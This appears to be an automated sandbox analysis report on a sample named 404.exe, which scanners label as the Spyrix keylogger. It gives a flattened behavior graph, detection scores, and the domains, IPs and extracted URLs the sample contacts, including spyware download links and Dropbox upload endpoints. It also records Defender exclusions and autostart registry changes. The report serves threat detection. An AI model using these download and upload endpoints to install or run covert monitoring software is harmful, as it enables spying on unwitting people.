            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
            Virtualization/Sandbox Evasion
            /etc/passwd and /etc/shadow2
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
            Process Injection
            Network Sniffing1
            System Network Configuration Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523866 Sample: 404.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 52 101 swtb-download.spyrix-sfk.com 2->101 103 spyrix.net 2->103 105 3 other IPs or domains 2->105 141 Multi AV Scanner detection for submitted file 2->141 143 Machine Learning detection for sample 2->143 145 Found stalling execution ending in API Sleep call 2->145 147 4 other signatures 2->147 12 404.exe 15 6 2->12         started        signatures3 process4 dnsIp5 123 filedn.com 23.109.93.100, 443, 49702 SERVERS-COMUS Netherlands 12->123 91 C:\Users\user\AppData\Local\...\404.exe.log, ASCII 12->91 dropped 16 cmd.exe 4 12->16         started        file6 process7 signatures8 125 Wscript starts Powershell (via cmd or directly) 16->125 127 Uses cmd line tools excessively to alter registry or file data 16->127 129 Uses netstat to query active network connections and open ports 16->129 131 Adds a directory exclusion to Windows Defender 16->131 19 404.exe 2 16->19         started        22 powershell.exe 23 16->22         started        25 curl.exe 2 16->25         started        28 3 other processes 16->28 process9 dnsIp10 83 C:\Users\user\AppData\Local\Temp\...\404.tmp, PE32 19->83 dropped 30 404.tmp 31 519 19->30         started        149 Loading BitLocker PowerShell Module 22->149 117 swtb-download.spyrix-sfk.com 167.114.14.168, 443, 49713 OVHFR Canada 25->117 85 C:\Users\user\AppData\Local\Temp\...\404.exe, PE32 25->85 dropped 119 cdnbaynet.com 167.114.14.170, 443, 49710 OVHFR Canada 28->119 121 127.0.0.1 unknown unknown 28->121 file11 signatures12 process13 file14 93 C:\ProgramData\...\qrl.exe (copy), PE32 30->93 dropped 95 C:\Users\user\AppData\...\webbrowser.dll, PE32 30->95 dropped 97 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 30->97 dropped 99 24 other files (none is malicious) 30->99 dropped 153 Creates an undocumented autostart registry key 30->153 155 Uses cmd line tools excessively to alter registry or file data 30->155 157 Uses regedit.exe to modify the Windows registry 30->157 34 cmd.exe 30->34         started        37 cmd.exe 30->37         started        39 wscript.exe 30->39         started        41 9 other processes 30->41 signatures15 process16 file17 133 Wscript starts Powershell (via cmd or directly) 34->133 135 Adds a directory exclusion to Windows Defender 34->135 44 powershell.exe 34->44         started        47 powershell.exe 34->47         started        49 powershell.exe 34->49         started        58 7 other processes 34->58 137 Uses cmd line tools excessively to alter registry or file data 37->137 60 2 other processes 37->60 139 Windows Scripting host queries suspicious COM object (likely to drop second stage) 39->139 51 cmd.exe 39->51         started        87 C:\ProgramData\...\info.uid, Windows 41->87 dropped 89 C:\ProgramData\Security Monitor\...\ffws.exe, PE32 41->89 dropped 53 chrome.exe 41->53         started        56 cmd.exe 41->56         started        62 17 other processes 41->62 signatures18 process19 dnsIp20 151 Loading BitLocker PowerShell Module 44->151 64 conhost.exe 51->64         started        66 chcp.com 51->66         started        68 timeout.exe 51->68         started        77 8 other processes 51->77 107 192.168.2.7, 443, 49701, 49702 unknown unknown 53->107 109 239.255.255.250 unknown Reserved 53->109 70 chrome.exe 53->70         started        79 2 other processes 56->79 73 WMIC.exe 62->73         started        75 WMIC.exe 62->75         started        81 5 other processes 62->81 signatures21 process22 dnsIp23 111 cl-e0469d03.edgecdn.ru 95.181.182.182 REGION40RU Russian Federation 70->111 113 dashboard.spyrix.com 158.69.117.119 OVHFR Canada 70->113 115 2 other IPs or domains 70->115

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            404.exe76%ReversingLabsByteCode-MSIL.Keylogger.Spyrix
            404.exe75%VirustotalBrowse
            404.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)0%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)0%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1006O.tmp3%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-83S41.tmp4%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-B6QNS.tmp0%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-CJK34.tmp3%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-DN3K6.tmp0%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-KK513.tmp0%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-PQPA7.tmp0%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-RPIHK.tmp0%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-S45KB.tmp4%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)4%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)0%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)3%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)0%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)0%ReversingLabs
            C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)4%ReversingLabs
            C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_iscrypt.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_isdecmp.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_setup64.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\webbrowser.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp2%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            spyrix.net4%VirustotalBrowse
            dashboard.spyrix.com2%VirustotalBrowse
            www.google.com0%VirustotalBrowse
            filedn.com1%VirustotalBrowse
            cl-e0469d03.edgecdn.ru0%VirustotalBrowse
            cdnbaynet.com1%VirustotalBrowse
            cdn.cdndownload.net0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://www.indyproject.org/0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://www.innosetup.com/0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            swtb-download.spyrix-sfk.com
            167.114.14.168
            truefalse
              unknown
              spyrix.net
              158.69.117.119
              truefalseunknown
              dashboard.spyrix.com
              158.69.117.119
              truefalseunknown
              www.google.com
              142.250.184.228
              truefalseunknown
              filedn.com
              23.109.93.100
              truefalseunknown
              cl-e0469d03.edgecdn.ru
              95.181.182.182
              truefalseunknown
              cdnbaynet.com
              167.114.14.170
              truefalseunknown
              cdn.cdndownload.net
              unknown
              unknownfalseunknown
              NameMaliciousAntivirus DetectionReputation
              https://Spyrix.net/dashboard/prg-listfalse
                unknown
                https://cdn.cdndownload.net/dashboard30/assets/Input-34212571.cssfalse
                  unknown
                  https://spyrix.net/dashboard/prg-actionsfalse
                    unknown
                    https://cdnbaynet.com/loader/link.php?prg_id=sfkfalse
                      unknown
                      https://cdn.cdndownload.net/dashboard30/assets/index-1178777c.jsfalse
                        unknown
                        https://dashboard.spyrix.com/cdn.jsfalse
                          unknown
                          https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsfalse
                            unknown
                            https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exefalse
                              unknown
                              https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate-fd9601a7.cssfalse
                                unknown
                                https://dashboard.spyrix.com/loginfalse
                                  unknown
                                  https://cdn.cdndownload.net/dashboard30/assets/Nunito-Bold-765bfff4.woff2false
                                    unknown
                                    https://dashboard.spyrix.com/false
                                      unknown
                                      https://cdn.cdndownload.net/dashboard30/assets/Modal-04ffda94.cssfalse
                                        unknown
                                        https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssfalse
                                          unknown
                                          https://dashboard.spyrix.com/favicon.icofalse
                                            unknown
                                            https://cdn.cdndownload.net/dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.jsfalse
                                              unknown
                                              https://cdn.cdndownload.net/dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.jsfalse
                                                unknown
                                                https://cdn.cdndownload.net/dashboard30/assets/Modal.module-d62c47b8.jsfalse
                                                  unknown
                                                  https://cdn.cdndownload.net/dashboard30/assets/Nunito-Regular-73dcaa51.woff2false
                                                    unknown
                                                    https://cdn.cdndownload.net/dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.jsfalse
                                                      unknown
                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      http://www.jrsoftware.org/0404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://dashboard.spyrix.com/account/login-from-program?email=404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://api.dropbox.com/1/fileops/copyspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://dashboard.spyrix.com/account/login-from-programspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://cdnbaynet.com/loader/link.php?prg_id=sfkdcurl.exe, 00000009.00000003.1457700688.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://spyrix.net/usr/monitor/spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://swtb-download.spyrix-sWMIC.exe, 00000015.00000002.1767737692.0000000002E2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://cdnbaynet.com/loader/link.php?prg_id=sfkZcurl.exe, 00000009.00000002.1457841190.0000000002B60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://curl.haxx.se/libcurl/c/curl_easy_setopt.htmlqrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                        unknown
                                                                        https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=CWMIC.exe, 00000011.00000002.1757964117.000000000296E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://www.spyrix.com/purchase.php?prg=sfkspkl.exe, 00000033.00000002.3201106110.0000000000915000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.00000000044CC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://filedn.comd404.exe, 00000000.00000002.1648823536.00000000026A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://www.indyproject.org/spkl.exe, spkl.exe, 00000033.00000002.3244401024.0000000004541000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3190059842.0000000000863000.00000040.00000001.01000000.00000015.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://api.dropbox.com/1/fileops/deletespkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://spyrix.net/dashboard/prg-actionsC:qrl.exe, 00000041.00000002.3109418320.0000000001180000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000041.00000002.3108663163.0000000001080000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.3127213030.0000000000D40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://api.dropbox.com/1/oauth/request_tokenspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://curl.haxx.se/docs/http-cookies.html#qrl.exefalse
                                                                                      unknown
                                                                                      https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.execurl.exe, 0000000A.00000002.1709007892.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1709050873.0000000002FD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setuWMIC.exe, 00000015.00000002.1767737692.0000000002DF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://www.spyrix.com/pro_upgrade.htm?lic=spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://spyrix.app/manual/kaspersky-loader/step1404.exe, 0000000C.00000003.1711461284.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.3020973710.000000000215E000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3003306994.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.00000000032CE000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://spyrix.app/manual/kaspersky-loader/step2404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://swtb-download.spyrWMIC.exe, 00000011.00000002.1757964117.000000000296E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://crl.certum.pl/ca.crl0:404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://spyrix.net/dashboard/av404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:qrl.exe, 00000045.00000002.3127213030.0000000000D40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://cdn.cdndownload.net/proxy/list.json404.tmp, 0000000D.00000003.2999750559.000000000330B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://curl.haxx.se/docs/copyright.htmlDqrl.exe, 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000000.3111598222.000000000058A000.00000008.00000001.01000000.00000018.sdmpfalse
                                                                                                            unknown
                                                                                                            https://cdnbaynet.com/loader/link.php?prg_id=sfk=cmd.exe, 00000004.00000003.1458085591.0000000002D24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://dashboard.actualkeylogger.com/account/login-from-programspkl.exefalse
                                                                                                                unknown
                                                                                                                http://www.myspace.com/search/spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://api.dropbox.com/1/fileops/create_folder?spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://cdnbaynet.com/loader/link.php?prg_id=sfk5curl.exe, 00000009.00000002.1457904714.0000000002BA4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1457615010.0000000002BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://dashboard.spyrix.com/1spkl.exe, 00000033.00000002.3244401024.00000000044E6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://www.spyrix.comspkl.exe, 00000033.00000002.3201106110.0000000000915000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.00000000044CC000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name404.exe, 00000000.00000002.1648823536.0000000002692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.spyrix.comspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://api.dropbox.com/1/oauth/access_token?SVspkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://www.innosetup.com/404.exe, 0000000C.00000003.1712113818.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.1712556211.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000000.1713397511.0000000000401000.00000020.00000001.01000000.0000000D.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://spyrix.net/dashboard/proxy/uploadspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://cdnbaynet.com/loader/link.php?prg_id=sfk$curl.exe, 00000009.00000003.1457700688.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.spyrix.com/terms-of-use.php)404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.indyproject.org/Originalspkl.exefalse
                                                                                                                                      unknown
                                                                                                                                      http://spyrix.com/manual.phpspkl.exefalse
                                                                                                                                        unknown
                                                                                                                                        https://cdnbaynet.com/loader/link.php?prg_id=sfk#cmd.exe, 00000004.00000003.1442867022.0000000002D24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://spyrix.net/dashboard/prg-actionssfk/sfkqrl.exe, 00000041.00000002.3110605698.0000000001570000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://api-content.dropbox.com/1/files_put?spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=404.tmp, 0000000D.00000002.3018349690.0000000002180000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3233766456.00000000031F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://api.dropbox.com/1/shares/dropboxspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  HTTPS://DASHBOARD.SPYRIX.COM/spkl.exe, 00000033.00000002.3247512604.0000000004BA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://https://-.://%s%s%s/%sqrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://cdnbaynet.com/loader/link.php?prg_id=sfkurlrccurl.exe, 00000009.00000002.1457841190.0000000002B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://dashboard.spyrix.com/.spyrix.com/spkl.exe, 00000033.00000002.3250270127.000000000653A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://api-content.dropbox.com/1/files/dropboxspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://api.dropbox.com/1/deltaspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.actualkeylogger.com/help.htmlspkl.exefalse
                                                                                                                                                                unknown
                                                                                                                                                                https://dashboard.spyrix.com/6sspkl.exe, 00000033.00000002.3250270127.000000000653A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://api-content.dropbox.com/1/files_putspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.spyrix.comespkl.exe, 00000033.00000002.3247512604.0000000004C18000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://dashboard.spyrix.comspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.certum.pl/repository.0404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://spyrix.net/dashboard/prg-spkl.exe, 00000033.00000002.3256791035.0000000007CC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://api.dropbox.com/1/oauth/request_token?spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://curl.haxx.se/docs/sslcerts.htmlcurlqrl.exefalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://rc.qzone.qq.com/qzonesoso/?searchspkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://spyrix.net/Uwas771wvshs7916gjqg62417/core.phpspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000002.3247512604.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://spyrix.net/dasspkl.exe, 00000033.00000003.3148880064.00000000001E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://api.dropbox.com/1/metadata/sandboxspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/404.exe, 00000000.00000002.1648823536.000000000266E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://spyrix.net/usr/monitor/access.txt404.tmp, 0000000D.00000003.2999750559.000000000330B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://dashboard.clevercontrol.com/account/user-hash-genspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://www.actualkeylogger.com/help.html#registratespkl.exefalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://www.ok.ru/dk?st.cmd=searchResultspkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://repository.certum.pl/l3.cer0404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://api.dropbox.com/1/fileops/create_folderspkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://html4/loose.dtdqrl.exe, qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                                                        unknown
